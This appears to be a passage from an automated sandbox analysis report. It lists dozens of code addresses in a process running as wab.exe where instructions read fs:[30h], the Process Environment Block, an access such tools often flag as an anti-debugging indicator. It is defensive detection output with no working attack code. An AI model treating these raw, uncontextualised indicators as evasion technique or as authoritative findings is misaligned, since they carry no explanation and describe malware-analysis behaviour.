              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D0C0 mov eax, dword ptr fs:[00000030h]27_2_22A6D0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D0C0 mov eax, dword ptr fs:[00000030h]27_2_22A6D0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC0F0 mov eax, dword ptr fs:[00000030h]27_2_229EC0F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC50D9 mov eax, dword ptr fs:[00000030h]27_2_22AC50D9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F80E9 mov eax, dword ptr fs:[00000030h]27_2_229F80E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A720DE mov eax, dword ptr fs:[00000030h]27_2_22A720DE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A190DB mov eax, dword ptr fs:[00000030h]27_2_22A190DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA0E3 mov ecx, dword ptr fs:[00000030h]27_2_229EA0E3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A74000 mov ecx, dword ptr fs:[00000030h]27_2_22A74000
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA020 mov eax, dword ptr fs:[00000030h]27_2_229EA020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC020 mov eax, dword ptr fs:[00000030h]27_2_229EC020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7106E mov eax, dword ptr fs:[00000030h]27_2_22A7106E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5060 mov eax, dword ptr fs:[00000030h]27_2_22AC5060
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F2050 mov eax, dword ptr fs:[00000030h]27_2_229F2050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov ecx, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1C073 mov eax, dword ptr fs:[00000030h]27_2_22A1C073
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D070 mov ecx, dword ptr fs:[00000030h]27_2_22A6D070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B052 mov eax, dword ptr fs:[00000030h]27_2_22A1B052
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9705E mov ebx, dword ptr fs:[00000030h]27_2_22A9705E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9705E mov eax, dword ptr fs:[00000030h]27_2_22A9705E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A76050 mov eax, dword ptr fs:[00000030h]27_2_22A76050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0B1B0 mov eax, dword ptr fs:[00000030h]27_2_22A0B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC188 mov eax, dword ptr fs:[00000030h]27_2_22AAC188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC188 mov eax, dword ptr fs:[00000030h]27_2_22AAC188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A30185 mov eax, dword ptr fs:[00000030h]27_2_22A30185
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A47190 mov eax, dword ptr fs:[00000030h]27_2_22A47190
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC61E5 mov eax, dword ptr fs:[00000030h]27_2_22AC61E5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A971F9 mov esi, dword ptr fs:[00000030h]27_2_22A971F9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A201F8 mov eax, dword ptr fs:[00000030h]27_2_22A201F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC51CB mov eax, dword ptr fs:[00000030h]27_2_22AC51CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB61C3 mov eax, dword ptr fs:[00000030h]27_2_22AB61C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB61C3 mov eax, dword ptr fs:[00000030h]27_2_22AB61C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2D1D0 mov eax, dword ptr fs:[00000030h]27_2_22A2D1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2D1D0 mov ecx, dword ptr fs:[00000030h]27_2_22A2D1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F51ED mov eax, dword ptr fs:[00000030h]27_2_229F51ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov ecx, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A20124 mov eax, dword ptr fs:[00000030h]27_2_22A20124
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F1131 mov eax, dword ptr fs:[00000030h]27_2_229F1131
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F1131 mov eax, dword ptr fs:[00000030h]27_2_229F1131
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov ecx, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB0115 mov eax, dword ptr fs:[00000030h]27_2_22AB0115
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC156 mov eax, dword ptr fs:[00000030h]27_2_229EC156
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F6154 mov eax, dword ptr fs:[00000030h]27_2_229F6154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F6154 mov eax, dword ptr fs:[00000030h]27_2_229F6154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7152 mov eax, dword ptr fs:[00000030h]27_2_229F7152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A89179 mov eax, dword ptr fs:[00000030h]27_2_22A89179
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A84144 mov eax, dword ptr fs:[00000030h]27_2_22A84144
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A84144 mov eax, dword ptr fs:[00000030h]27_2_22A84144
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A84144 mov ecx, dword ptr fs:[00000030h]27_2_22A84144
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A84144 mov eax, dword ptr fs:[00000030h]27_2_22A84144
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A84144 mov eax, dword ptr fs:[00000030h]27_2_22A84144
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A88158 mov eax, dword ptr fs:[00000030h]27_2_22A88158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5152 mov eax, dword ptr fs:[00000030h]27_2_22AC5152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2C6A6 mov eax, dword ptr fs:[00000030h]27_2_22A2C6A6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F4690 mov eax, dword ptr fs:[00000030h]27_2_229F4690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F4690 mov eax, dword ptr fs:[00000030h]27_2_229F4690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A266B0 mov eax, dword ptr fs:[00000030h]27_2_22A266B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7368C mov eax, dword ptr fs:[00000030h]27_2_22A7368C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7368C mov eax, dword ptr fs:[00000030h]27_2_22A7368C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7368C mov eax, dword ptr fs:[00000030h]27_2_22A7368C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7368C mov eax, dword ptr fs:[00000030h]27_2_22A7368C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E76B2 mov eax, dword ptr fs:[00000030h]27_2_229E76B2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E76B2 mov eax, dword ptr fs:[00000030h]27_2_229E76B2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E76B2 mov eax, dword ptr fs:[00000030h]27_2_229E76B2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED6AA mov eax, dword ptr fs:[00000030h]27_2_229ED6AA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED6AA mov eax, dword ptr fs:[00000030h]27_2_229ED6AA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D6E0 mov eax, dword ptr fs:[00000030h]27_2_22A1D6E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D6E0 mov eax, dword ptr fs:[00000030h]27_2_22A1D6E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A836EE mov eax, dword ptr fs:[00000030h]27_2_22A836EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A236EF mov eax, dword ptr fs:[00000030h]27_2_22A236EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E6F2 mov eax, dword ptr fs:[00000030h]27_2_22A6E6F2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E6F2 mov eax, dword ptr fs:[00000030h]27_2_22A6E6F2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E6F2 mov eax, dword ptr fs:[00000030h]27_2_22A6E6F2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E6F2 mov eax, dword ptr fs:[00000030h]27_2_22A6E6F2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A706F1 mov eax, dword ptr fs:[00000030h]27_2_22A706F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A706F1 mov eax, dword ptr fs:[00000030h]27_2_22A706F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAD6F0 mov eax, dword ptr fs:[00000030h]27_2_22AAD6F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FB6C0 mov eax, dword ptr fs:[00000030h]27_2_229FB6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A6C7 mov ebx, dword ptr fs:[00000030h]27_2_22A2A6C7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A6C7 mov eax, dword ptr fs:[00000030h]27_2_22A2A6C7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB16CC mov eax, dword ptr fs:[00000030h]27_2_22AB16CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB16CC mov eax, dword ptr fs:[00000030h]27_2_22AB16CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB16CC mov eax, dword ptr fs:[00000030h]27_2_22AB16CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB16CC mov eax, dword ptr fs:[00000030h]27_2_22AB16CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF6C7 mov eax, dword ptr fs:[00000030h]27_2_22AAF6C7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A216CF mov eax, dword ptr fs:[00000030h]27_2_22A216CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A26620 mov eax, dword ptr fs:[00000030h]27_2_22A26620
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A28620 mov eax, dword ptr fs:[00000030h]27_2_22A28620
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E627 mov eax, dword ptr fs:[00000030h]27_2_22A0E627
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F3616 mov eax, dword ptr fs:[00000030h]27_2_229F3616
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F3616 mov eax, dword ptr fs:[00000030h]27_2_229F3616
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5636 mov eax, dword ptr fs:[00000030h]27_2_22AC5636
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2F603 mov eax, dword ptr fs:[00000030h]27_2_22A2F603
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A21607 mov eax, dword ptr fs:[00000030h]27_2_22A21607
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0260B mov eax, dword ptr fs:[00000030h]27_2_22A0260B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E609 mov eax, dword ptr fs:[00000030h]27_2_22A6E609
